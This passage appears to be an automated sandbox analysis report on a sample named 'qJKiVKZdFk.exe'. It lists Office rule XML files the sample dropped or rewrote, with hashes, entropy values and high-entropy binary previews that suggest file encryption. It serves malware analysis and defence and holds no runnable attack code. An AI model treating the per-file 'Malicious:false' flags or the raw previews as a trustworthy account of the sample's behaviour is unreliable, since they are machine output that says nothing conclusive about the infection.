                                                                                                                                      Preview:<?xmli....zq...2o|i&......f.3.vm..p......6S..'VF.6.v.y3z.qr..)..+.........O...R.J. .K8.Z.-5.;d.}....g.$.Wv.&.2.....8(.'....C.74.v.z......[r.C.F.&.H...^...Ux.V.G..#>J...."......;...elo......x..gy......S.p....I.c...YW..5.. m*@....b/._.%......3....x%;.r@ql..V..3..^zb[C.."Q3.=.(./+.mZt.M....pl..Q..Cz.Eo..W.....+C.W..e..sZ..ri.V.. E....\=.8..dq.4.6...O.c..F.W.k(C.B....v....V..j...MH5_7.S_..8.q..........9.....%...U......'.I.7.9s&.......Jjg.J.~...N:.H ..../TDP8m.Vno....HE@..;..]..!.xV...*...n..f({...)....]..u...VS.9....;*O......`...:.ngD..........H...QY[....^.I]..r~&[.6A.......*.S...t.F5A-.?.A[....k.o..6.....@-~.5......7...ePX.9...e.~l.y..#sC...!.eM...........3E....1.`..8c2gY-.&.6.......N..._F...$.]...8...B,.5%..A....+....^r.Q...........KC....o..}......X.T..<1U{<...L...Q...V.m.6@.$5...Z.......dB3..^.k8.rxh.DZQQ+..f.d...(Y..%7?..;!.G....I....G.1+.%....MZ.c.@....W..'C........B*..JL...t.tsV..........V..F....mew...=U.6......M.KG....J.....~...c..69r.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222101v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2075
                                                                                                                                      Entropy (8bit):7.904149673463992
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:bR3gs+lQwQ9NZ2CiZhXEgaCFLoqWqOIsjdqjTVxvafiuOZD:tCQwQrZ7ib0LCh2ojafiuOR
                                                                                                                                      MD5:27082CE184F5483E1C7E249C03AF22D6
                                                                                                                                      SHA1:E28B27E9963247EB147CC3AC6A4FDB9A980FB720
                                                                                                                                      SHA-256:0AF8F1D78B59F467AB1BAF87B73C23F16A0219AFFB16A50D18CAFB3D98596AA1
                                                                                                                                      SHA-512:02537EF8CE1C1C3BA381D07228EA176C63CFB317E51F093130D499B0CE1343FAE544DEB23C7811B288045D3DB71FD60352B5BA0597FB1AE8CD6D5037CD1DE969
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlQPB...:.l$...M.yN.4..&j...e.8"v.<.F.\&.`.....>'F..r..b.d..>L.Q.T.l.3.*H.F.Ne].*.+^..};.aZ&..7.I..e....R.@..Pd;.IS.aG.O1pvp.ly@.!.....I....!'.^+a&...../..@...>_.....sNS.e..g...n.fwm4....Qlu.8$^........N[%.3=..3.....[......U...N%{.8...z.|.|w.F9!z..I.BS.#=...<....g.q..bA..,....I....i!.)K0.[.J..hH..M.<])}..3.X.vW...b..N.=...B.:>h*.{.>s..>s...=>..=g...2.*\>7../.1X......g.2.8..t....EN.....D..($.F..6|..x..DzPd..I...L..ec..z.../....O.4..VT.Iv..:ay.....jhA../.....O..,....G..F_.j'2..!.[.I./u..\U.....I..l,.yW7..9.....B...y.y....>...<.C_.fg...#R......zu$..7>l.5h..Q..J+.3]q....I:....(.x.N#..A>.`g.J^...Zd...'...w.b_t.rq_.....r.r.Jci.}.2.*t.L._{..&...\]vz+......V.q.w#.....[5".#........'.m....G..=^..\..3I.;..d.....D.u...<.3m.._?..Q...7.....k.j.0..h.9X3Z..;...m......&O<..(.q ..... .hH4qS;.H.....i.Fm.l._.^.|....!..[f.<j....$..&bG../..W.V?...G.......Q..|..[.H|.+?.'.......2..g.&......r.m.....8.vomn..L.....Z.F.m.-c7.x..3...DS..._..;.......'.9.....I....B.....@.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222102v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2088
                                                                                                                                      Entropy (8bit):7.902352545221023
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:FIqqsvp2Sg+SAyxFYeHJqCWpFoX8P6Xwrx4+D:FIgDSHRJGFoXrXQ4G
                                                                                                                                      MD5:E93BCE29BAE35C9DEAF9A8FFDBBF94A6
                                                                                                                                      SHA1:3FEEA9C741E11A33D60CEEEED492ED3AE2F25E9E
                                                                                                                                      SHA-256:E97C54E5F76EDDF262DDC9F854B41192812915DDC66353470345DA2050607E09
                                                                                                                                      SHA-512:7ECB7EE4E48962D64AC21A7EEA110CBE9D81EE4B22195561986FB4A3DBDF97B5D8B6EF6F4D674E6D6B9318F098AE28FB09191084CB8BBD50BEB72DD5A8422F96
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlS...q....kq...i.x...eGS..3.k|..r#..)f....*w.....I.?.....|4.R..}.w...2......(....>f.C..O.\S..g.5......q...n...>.._i..9.......V/.}..&{l)(.4i.....D.-.L!........w.Ygi.<b~-. ....N...u...N..........g.[...A..E.$.3....%.Ze...y.("...J.D....p.6~.....xY..[..Hq.y(.w.V..[.,Bl...I...l...K.o..By./...{.b.3.j...".)....>]U..8.....^&.l...,~..#_z.5..Ye.jW.rSe.qE..A....<6..2.......6...u...J./(.....s.~>.K...oH1..:.s....e9U1...G}..g....-..F...=v.......$...lB.`.......}..n..hK.Gc.ERh.-Z]..f..*...n......I..u.<r....F0..w.-n!g..B..,zO:...e.\.5...I.K.....q...jL./$T.:.9=..M..a..1M.\..t.8.../@....*JiM....{.l.b.....ds94.E...+.@...0.4.K\mi2...d.AM.M.4XUi}[..s.(...6.].,Y......3...|...;r.D1..w.2..w...V.we.z.......`5}MPHa.....jn/A.3.Vm."#..<..V...T..P&.H.mC. ...1.R.-H....j......[.m.)y....%@B...&..fv.d..:.Q.$.d.A.....Y)1@.^.|.Gdb..0.Q,."..(...'4m/.*-.mRQ....:dx.v...Z.2...;o....*...'..0B.....B[li(.K.[..P..e8..7.j..3......v...z.*.%..a.'%6'......R.L^...N....T=......K....CI9..>...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222200v5.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1563
                                                                                                                                      Entropy (8bit):7.8778891101362785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:2uky2VWbNW9ULR6bniKRPONr5Mq/Cu/zVCD:Pkr0UWLRQnLRPONr5XnM
                                                                                                                                      MD5:D05752D622CAE464F95F26F929127219
                                                                                                                                      SHA1:1301D3FA909BC2EDE676548750409D6D49DA2CD5
                                                                                                                                      SHA-256:8A3EA7E7CB7C43ECE144B5E23303738FFC3B4A0580DF0B865F5964FBE6D11385
                                                                                                                                      SHA-512:A97FB23CD9B8A5DDA58FF287BF0393749B5B7A8840E94F3DEED681CA1193093E538C83FABC1E4279D5B177B8BC6DF394B8D33AA080D7C522BA60EC91F60B4330
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...{..t.G...\......<t4h.h..i.....1...G...?]+I.t..ezF@....?.[t......_..:.~.[^.dV;%......).e.V2.....>...iU...K..^.......$..+(J..(.._x.A.f..u,..I.vL.....P..{.-...&..].cZ...f.Cg..e....d... ._...7v/...u..O.:.D.J..@...."Q..Y...\N....`...\Nh.....{..!.:...%i.c+,_A.L...9.j...M.c......8.Ysy. :.....9...S...>.....!2i..!.1..@..F_..Z..(`.=*...g.-.v..0..w<!T$K.P....S.Tq...MzJ.xjV.6....u...V.b5...y..'..D...XN..,...9.E...9...#...yB....i]M8.'~).z@.\.....m4..K."2..:.]..3.S.........z.*.B....<.b5...j.h...P9Vz...9ou#.*....8.>ru).....&......o}.;$.^U.y.c.l..fs%i7..g;wD.../i..g.f/7..=$.E.+......Ym..y.Q.L...17u..K.}3...m........U.x....F........g...n.]..E....N.M..2.i0">k2.(..a..9=V..RZ'6.g...l.|p.....\M..)n1.{.....U..;....}.l.H......3\x......y... ../5.._..Qe.{..).g.3g@.....>...Kv......e..f..sZy?.;4.......>J...;.........@.............Uv]...e...).Y2.I....s.=..'Z....n|..x.....z.I'...%r.f.A....X ...A-.1....%S...<.....r....5......... .Xd.MO.....4g[.5.lD..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule224900v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):777
                                                                                                                                      Entropy (8bit):7.713314449814087
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:M6M5WYWO9x5PxhPkE+IIkhPnDK1BCUjBc0dvKMNz14OeW7L1IkC1ZHrUknukIciD:M6MwYW+VxxIII0nG11Fhda4IPZLUJbD
                                                                                                                                      MD5:66073B2705446A788A8387BCE2D2E6FD
                                                                                                                                      SHA1:E050768AC494B1EB130356FD0E55905B6C835215
                                                                                                                                      SHA-256:C14AD9D16DB82C805019AA1A7575F85E572CA2C8635E206B144094A0150924F3
                                                                                                                                      SHA-512:E72ABF19E13654895DA3EC370ED213EF56F7232B8503F0BF78339959044EEFA653AB96E8E06672604AFDE4D6FEA2AF150ED4B33F5ECDB29A1BEEE6660356576F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..$.[j.2.<A.A.W....%e..."_.qZ..;mIOr...$....js.)..>.4-....xx..%.2..@@....@...E-..^.L.......p7.5T......`(...4|i.AN..[6....7..^.WU..{..N."~.."O.Dh...`Q.$wv... .4...#.6....M.A.H/.....*..].z;]F.'/[r..... y..]..h..}7@Y.$.|./^.K..y.7....6D.L._."S~8.u,t*.. ..#...I".lr...P......."..@....1 .:C..O.kn.,%.M...$1.je.`!..*5.%....."W...x...{D....xWN...[.....!....L.|r.hF..o....@r.I...fA.{.:...G.m80..L...0*PR:.%..a.\k....{..T"."...ICa......}......[.14...DL8..&[..23......"......m....[...`.u.k.........Z.._5.^.n....XOc...8.).f........WN;m.6..........X.ndd.e....BW......p....._bKq....Fp.ll.....a0..*../:Q?.....a..9%zM..[.J..J...k9g..o`..g.<v.$.....=..?u.....l..@.+.(tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule224901v11.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2618
                                                                                                                                      Entropy (8bit):7.925210698240281
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:E7ZjVY3S4v36mwNLPUPLIxV58y+l3T7yQ7HD+qcKhuKM0T/UD1b8+ID:AZyi4vqmuLMjyX+wQv+DuuE/ZB
                                                                                                                                      MD5:3A2FEAC824D84B0D5D427A06B276AE5C
                                                                                                                                      SHA1:7CB3D565D989519680644128B506F54DF2A363F7
                                                                                                                                      SHA-256:3DEA5400226C694035F2B417C03CE6BA756DE2158A03113252C2AF9257373414
                                                                                                                                      SHA-512:1798BA044BA91FE61E8010CB0724C611CD4177B8DE967EAF4B63EAB634F8ECA9EB0F2D2C3727BDFE3AFFECF83F20EFE81ADD49B2B0E08FF19DE16F73E9DFAEEB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?+.^+.b...J.....|.....g..~...B.G}.8....h1...7h^nW..W...z]N&_.|..&g.....B~.O......1.9#.Xo...Ki.E.)P...y.j&/.>r...........".zD.)LS...Lmy.=.g.-v.je..X6.....KO..k|.9.A...+Bv.... ..M.Z|.A....".S.$&.Y...../c..N..j.6.(.h.O.,#...f....Si..@0...E........x.(`...."...w...h...w..R.M.:...G..~....T.d[..p.N`..i......`7.9....W7.<.Q..g..vy.\ .$Z.w.8.<..C...U....7...S..<sQ.+...f...;R...\A.p.S.V...Od4O....J...sZF.EkX>o...M...R....i.n._K.G...0.I.C..u.X5Gi.L.6.y9.q.]jd.*.wX.3..^Z."..HSW..._S.V..9...z.[.6v....c..........z.k.......O.....S.....Wko.4.UJ#kS.r....C....k.....v~...KX@P.........G....Z......H.u.......fK.^...P...I..].(..... .ua.]@K..i)dQOq.2Z....3F.;.....\f1C....q.$..N..p....v2}...../..vE..l.:......7=.8......}6..H.j....W......W).w..:B>..D.#&.%(3...w...{per.)....Mq.:.70k.D=..S.....7P/.IY_)..-..32....)..@f...+..T.>._.F.......4u...|..~..Eab............RL..dt..(.]DL./.H...D....a......p\.k.......HSvp.V.C.].u......m.N...7.*.a....9B/D...7.Z.I.A.@..R=P.iQ..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule224902v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):784
                                                                                                                                      Entropy (8bit):7.7231462738978855
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Ip2+YL1zd0RjUSORRUumT8muY0TPjDPH01oUVtVExPY11aAWKfOHzGw7ukIcii9a:e2+YBKY9RRUN8WKL7Ue8DENpAbGqHbD
                                                                                                                                      MD5:A9370D7A72BB2BDD27E548C287949DB4
                                                                                                                                      SHA1:654C10581A7D7E3EC9FDA8F59B6F4FCE4A5B48B7
                                                                                                                                      SHA-256:EA96EF65B51BFD1D9586DF35DBED924361028371DCF562CFAC4B49680A1C71DE
                                                                                                                                      SHA-512:3E6035922962732C7589717A6CFC72E8C6510B606E98294C8602801CC1CC1443283FB5B1E98A420A82F8AB89235BE6FCFD8852AC7EBB8D34A0B242F23696352A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..4....\..5]Xf.j^.-...@.-..v.y..`D...9,...]0`.R<B|....M}......n.`.R.Yu..`>.., .$.#h..$M.|.r..80..:.x.I...!..J.l.UV.[....E.h+.Z.+Q..h.....]&.f.... .A.Id..%.....f..#.D.K.p.se.........R|.c.Pw...(N}.Z...a.VVs;J.9X'l.....".~. IgV]Ig..$...N...P]-.#......t".}.9..eF.<.7W.w.Oa....[$.i..{y....&_.....?...3.........*D..;.x!j.Ok..Xx.......]1...z....b/f..|S=.DH.!..a..D.A.f4.......Nm..).`.......*..M......wMB...^d./.....b........~.,.X=.pGb..=.A..:g....z1.:.Y.%.T......K../.=.xxYD..:.S.P.}O.V...4Om..U.5O...Q..5...?.....|...\...u...Y|eL.....t....6.v.|.......V.#..0l..(.f.>..=..J..Z..Z.+.?tHyY:._mfZ...h.9.....2u.sq.........e.2...L;.z ...s... .J.c.%.#Z.......N.'...'.%..q.A..%ze.CN.&..x.Z.Qtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230104v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3148
                                                                                                                                      Entropy (8bit):7.943011712563629
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:LehXveRj/8xBl6FGMGuI/FZA1zedrOBT5yWKvtzxJ7hDrkp4O7hIzzLeEOBQAe5F:0i/mBl6rXKA1yfrkp4OazvSQAe5XV
                                                                                                                                      MD5:B0FEF108925CB98FD21DD91B7A9EFDEC
                                                                                                                                      SHA1:59E04B717FC213A03ACE6234E68FEE38C4974269
                                                                                                                                      SHA-256:9CC3E050FD8352BD5AC443E72AB10BCB4275BA334130D6D6CE2BE48AB4C11F43
                                                                                                                                      SHA-512:7FAB1A8F8609064667DDE59543C2E72ECDA56AC43608859C84E8B89FE7180A7DA5D36C7EC9EC648C9E11DA5DBF25C1F65AA60E525AF8C499F70769521F1E17D4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?f.....z..b.ZJ.}..8:MS3f.........p.;...uV..)......<c...OM"..n...>.8Fo..!'...i.c|[y.OP+...H..y......]....Y.....PzZeT....u.....i.y~.Z.=[.V..OS...9jd..:...2...?.Axd......U...j^$...z.nBm(.m....t.J....20Dywj......h...Q......F*...7%L..B)....Lv.D.-.h....#xrV.E.X.8.>.$2I.+,..Yn[u.S..b)k~xrV.U#B..D#5.I..~..4*O{......=.H>.+..R.....GLY\\....`..!..b..4........g..O.....D3.J..|.-.qLp.s.E..g..X.....&l...`~..Te|.p!.<.....l....5.<..X..0N..aL..j......]....".m.tS.u.y.T...,.*....0M.9.e.1.Q.........[...&[.......(...'.;m.h..R...N......9.PU...XK .KVb...a..e..K,..SE!).(...@`.x..e....6..-.....^.7..m...t.........#.1.d(...X...ZEQ.^....$..\..#....BQrr.+.5..&E. .r..t39.M.."....4.L.....+>\.S..P...y{].......n.?. G.B....I.V)_.*...{.....Q..d.'b.f..G&..[.P<..[J.jR..2A.\.R....n.......O.f..S,FD].6.7.m...=..h..i....t....|.8..$.Z.CS.t...?...[C..|..f...;..]..\.5E.....,.)..8.=t.....THH.......7.o....=A.G..j......?..,.b..#.+No....~e..[.=..<......k..q.. R *.3nQ5!...pcs.I......mM..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230157v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2238
                                                                                                                                      Entropy (8bit):7.9145650731360275
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:iqDBnUEaHiBD43VFF9NKtzxM1wv2nDg8QXkEatMSLmHK+XaDbJwyD:iqDBXaH9Fb9TevAMBXuDmH/sJwa
                                                                                                                                      MD5:852E2971ACFFA9041A3F276E962F1B94
                                                                                                                                      SHA1:6816DC0D9B47CE765FC62F6700D440FAF438E10D
                                                                                                                                      SHA-256:DCB36C3494C0C4857F3C9729C4067C0FBC0FDF40BF854C0349F0D3D7480F1CC9
                                                                                                                                      SHA-512:9DE48124CC303D1D56E74CC45DE1F458FDEE4C097B4D1A8C789295A9199DE6774D26551DA048CDC803DD69B80BFADE4626002061EE000CB12D510AA8440F2CA8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?v..p..k......yG*..P..fkA0.....{.zx..m<...b........m.f..r........HH....be.rj@.B,Y.`A....9....^"H....DLg.v*#s.l..l;....k.Y.;...rq..O......K*.a.......0. ...)PR.;... U...E...x.n..u.Z3......".'.....L.cl...u%.I....>.S...8>.......(.]...z....-g...5.%;.....VV]......I$........e..jOg%...] .....{3.e+^ OL..{.X...c....;f#E.O...k~.O...@.............l{...B.Z......3!}X. 6.].M......(*.c`.d...&.*...|...(..P..;NLT.K4..!q....o.X]*c.LA~..Gu..[p&.....b.x.GJ......&..^.0........A.i$.S..!s..:.........Un...].<.B.....22.....C...J3...../`7.......4..H...'P.>..S.q(.ON*c8.e+z.".....K....A.,....uv&.-...B."....U..<#..~N.3+M.f...(..Zze&Z\v.N:..Z&..s.QZX/....y"#.w.VF..q.N.\.u..'.QF9{SO.%=fG..}..".........J....#..c....]..w...K....'xn%7rJ.6.i..0.g.Qs.0....M..}.z..Nk...p..T....fM...)ZD_0.....)1.f...@...$=...ZI.Q........4.l..8..i.l...P.. ...>....Q?..|.+.;..'-..:..j....//...Q!.. x!..\. .A$.-W..\.9....v....U..D..|.........7.QV..~....G.s.T......U.H).........c.)......^Uy.2

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230158v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1925
                                                                                                                                      Entropy (8bit):7.901781928932625
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:05CnmkYG8JxgTN8B1caLaUGARfYOEyYyIKu7D:05CmicgpQLaKRfYO4f3
                                                                                                                                      MD5:CDADB79E38BCA41CBF5B973F43FF620A
                                                                                                                                      SHA1:72FE9F8CF9525E8C1B6473389E203FC41BE7A453
                                                                                                                                      SHA-256:6628214600EC518C53B0AF4E7F006FDE29E0D57A3EBC6AABE185B0F576B1F6DB
                                                                                                                                      SHA-512:D32FC0C06442D38F9308E6CCDD5399210FA10DCA828C7DF218F1D605013DEB4A3EAB0B358B4FCCCE3B2443648C83C10D73D6C5321F518CE3529CD6BCDCAB7DBC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?...\..X....>..........U@.^..B.]5......>.....$.5t..WL(....n...}t&...N#<..[.5.'..a..m...K...!...l....D. }X5..d'pX].....${$<..iv`........\z.0;.g... ....L.k...G..)..v .@..Q.......-'!Q...u...../\..y.=V.f0...5.-O.+.c....=....2..+DC.r;z.o=...t...?j.wX]..F..].<.!.0.$....F..&7sy..P..cw..T.!$P4k.=-..........#...Zr%@%...+...s.R......eG..>;Y~...m...NG...V..".I&.Cl.R/.]....ry.6.......M....<...f.i O.U.......*PnNy........Kj..C..(.m/L..r.\..a$...U'F.!..4|%......Q.....q.oE;9..N...d..0.man.R$.e...P..+')..\...:.z.8.J.*25XVzm.r*~"....h........Hd7...3..4~H(...=w.......wx!._......r.!<..K.aD...c......<..62F#*9.a..c.g.$...E.ea...0..41.g....Wvp.A.b..o.p.......:...Q.....`.<.=9..}...A..rr.@....&..6O.....[,9.........T......F0.lz........:Ov;ld[.xK....A.9..KA;\.....Q1'.1..M....[.RSE...Y.<A..\.............1W.j/..L.Yq.yo...w .M.......?...Tv...*.`*.r.f....nBV.2._{q.../.....4.}.....t..r..1K.<<..>....v..:g..J.f...NQ.,.AJ.....e$...w.s.H..g#xH,).w...0g..v?)..N../.4.*Z.v.s

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230161v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):911
                                                                                                                                      Entropy (8bit):7.783238436476652
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:6HY59DmwUTVkwM9YH9NY+Jao38XlWo8bD:649DHf+r3MlKD
                                                                                                                                      MD5:8CC10009DE9838D58D3F6B3C81C583E6
                                                                                                                                      SHA1:AECF4BC519304A45FFE28AD076BEA65848CDCBF6
                                                                                                                                      SHA-256:B79C6BDDE162EF380577822D2085FB317E92B80197C4F2D0328F15429993314E
                                                                                                                                      SHA-512:08D9CBB5ABB6CBDE22BDD20645C462C5144944472BA60C9570C40172F84F47C1B31A749AE84544EC6000C89D4B535D63513F25482F6C020E92ADE0BD6F143C95
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....#...[..R.MX.6..t.#...$......p..>.Bl..L../.U.....D/..!...W?..H.K..B)..HB&.8=.^.4...I..Q...u'Uw..M.X..`.)...].....d.a.c.......]..9$7?p[......k.._.r.`.y.`.".C.......n.>.+!.2u.MD '.{..ge3.......5m.>?.@...J...=..2..%.If(......xN....oD.H2....7YrXj.jb..7#.&W..wH;...R...c...<7......Q+....V.He'.2..&.........]..#....^....q..7Y....N......P.l.:...Oc...*P..}...q..:..i...).....k;......s...c.....;.a*ad..9.g..R.'|.U.o.<.Y.%..Qm.W_..[W.X..2.+A..].m.H.R...s.r...E.%..^_g"<.x*.x....\.V....w.,..g.pT.}..t....t.."..B..6Z.......O......G''J...H.l.A4..qFV......7v......Y.1%H:..YGFH..(w..pO..4./........1.bg.UW.E..w<...Ma.E@n..;o&...2.k#.-:......j...L.h...8.&..L.R.g....S.E@.....}.._.........}f...a;.K.L.!$...9....2..i.Mt..A.f.F..F1.(.....H..........z.a..a*........L.+..... ..|..s....t....f..'7........84tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230162v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2021
                                                                                                                                      Entropy (8bit):7.906835092076676
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:PFzfR3YESvegVqG0EQuThyGk2QASwE1jlBFDoyCRnn64D:9zf9Sv34GxQuTepAqBXCRn6k
                                                                                                                                      MD5:50F83C2B9D4AB1E80F1F1579AD280337
                                                                                                                                      SHA1:5EEB3464461C99E92861B42EF50F204A93CC80B6
                                                                                                                                      SHA-256:A367618DA6A49FF132023557F324B570DEACBD87E2EBAFB2AE9655385861615A
                                                                                                                                      SHA-512:5F26563AC22402ACCB88FCB4BC00782515F5E4BD5BAB932C6693EE41003571C6D24D9933282A39BC3B7670A8A7D778C12FDE6D878A8C551DD5E201D1E45D4187
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?l9)..F.'m..........6vn^%H..5......g@..;.z@.^..o%.-..5.....$.b...jjS..4L.....M..e.w|g..~:.."........9.)....@....h1>NM..k.G5.'y... .....y.....&)...Ziae4.jb..th/m...&.-.B5....~z.....^.o3.UqN......[.s..u.,%n...'=.d...\..J~Eg.I.j..-nE%a..9..K..a6.I3.../..&..Wx xI..X......O.QM.q....Ra..9..AX.f.&".9.\.3...F."...Jx{.Gv.....[..U...."^..#.0..V................c...GU7.7.dZ.(.{..g..m.8.....6\.9..i.................f...J& xnW...1..|..U.e...om.j..)......+....<..H.eD..M....}l;`.l...H.1..W.q...$.yq.VVA......t..#.c........4...F.....V|?$`.VybY......,.....E...R./F}.......A5s..NMk.-.Q7..L.q)....UlKV.}Ro.r2.[.C..O|....1q.A./.$.g...Z...R_.gJ}C5....M.k...C%....KF.].. |.../_R..`.*y..."].....2~.T..M...ag..g.#............].<2q..]s-.T....X/;.W...~..u..V)z...........J..=#.x..H8...(0.S.>p.{.;.......L....v2z~R..\......]....vUgM.~.).!N.@.d.y.....J..-.HS.aX..J....w...x.D.....F{....c/.{..Z..>....^L..4.S.X\B@..vR)...1=.B..'*y....0p..{...c...A.m..[L...q.]..[... ...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230164v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1187
                                                                                                                                      Entropy (8bit):7.8291545385626184
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:XAxqyvcP6ywUVNSul2Nz23jCooS/zUDt9C6gx0Y2DsF3m2LQbD:QxwP6RUWrzNXEzURc6m0YJfLKD
                                                                                                                                      MD5:BABC5E4F834124FDBF32018564FA8AC0
                                                                                                                                      SHA1:824D90450597C03487B4635984C1AF35C22F5F29
                                                                                                                                      SHA-256:CDE109DE728A587384F9D0D958F229718836E0F4B48069B81D968AD543156CA8
                                                                                                                                      SHA-512:94FBB5F88BF9D33D4B4046F407C9DFAA35312404F5B9B0C2258EBD6F5A27C50BF7D8F5F358B7A3E45B89790F5F90435909D2EC5999D297E68A5C7044C2E0CFC2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..Y*.z...4.{X}.2.Wz../Xp.-......5Z\...{K..@=MG~.....a...........C.o..U.7.(N...6...o......7..c.b....`'.....c2.........#...>x..W......g.(..cl.b....'E..g....x"*".6.n.}.pD...6h....aY..a...1...7=....%.h..Iz.5."..o.N5..Vqp.g<$..uE....q.....,.........h.,..,.[~.:q.5b.[$\=N?..W..J}...*.:z:+T.Q.....?.-i..v.).......U\.`[.^O>..k7.Z.r...p|#aI:=/..!0_.*.5.!1.._..o.Qw..AA.$.XA.,..P...#.2....Y....x5.t..'>.5%>.....P.I..].P....d..k..*6..........C0..9v._._.<.M......]#.R...Tv....&.D...~....A7.....#.36?*..L.\..b)S%)Kuh}>kf....h.4>.T......x..i..`se=Nyjz1..W...>.L.0.=.g.SFJ`....'O..A.T.c.l9....2.w..S$.2./.[...4._..:.B........ZmU..#.".+...#...+.N./+.&..}....T..voYY..I..d..a!Mn....9A~<1.!....._Cr;5.*=`...>.T*.9.7....&.........k=.I.D.!.y....9.*.......lt..21.YUt Sq.`*.]....o..G....|...n.1.F_|.-...kf:..9.N..;.)&...L.X@..O.................u%..A.\WV...,...B.# ..q.Q.......Fbd.w...&..q.)..d......[a.....q,ig..[/...5..W1...?.O.`..>?.........<...'.@.kmZ^.,.x.h..6fGw....1

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230165v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1183
                                                                                                                                      Entropy (8bit):7.832001455116908
                                                                                                                                      Encrypted:false
